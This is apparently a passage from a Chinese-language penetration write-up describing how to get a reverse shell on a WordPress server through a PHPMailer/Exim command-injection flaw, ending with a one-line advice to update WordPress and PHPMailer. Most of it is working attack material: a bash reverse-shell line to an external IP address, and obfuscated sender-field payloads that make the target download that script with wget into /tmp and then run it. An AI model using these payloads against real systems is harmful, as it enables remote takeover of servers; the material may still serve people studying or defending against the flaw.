蚁剑连接:
利用的思想跟写入webshell差不多,是先使用curl或wget下载含有执行命令内容的文件,再通过命令执行达到反弹shell的目的。
利用步骤:
发送payload使靶机下载1.txt,并保存到/tmp/shell
在攻击机上监听9999端口
发送payload使靶机运行shell
将bash -i >& /dev/tcp/139.198.172.202/9999 0>&1写入到攻击机1.txt中。
发送payload,下载1.txt到靶机/tmp/shell。
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}139.198.172.202${substr{0}{1}{$spool_directory}}1.txt}} null)攻击端监听9999端口。
发送payload运行shell:
原:aa(any -froot@localhost -be ${run{/bin/bash /tmp/shell}} null) aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)更新wordpress、phpmailer到最新版本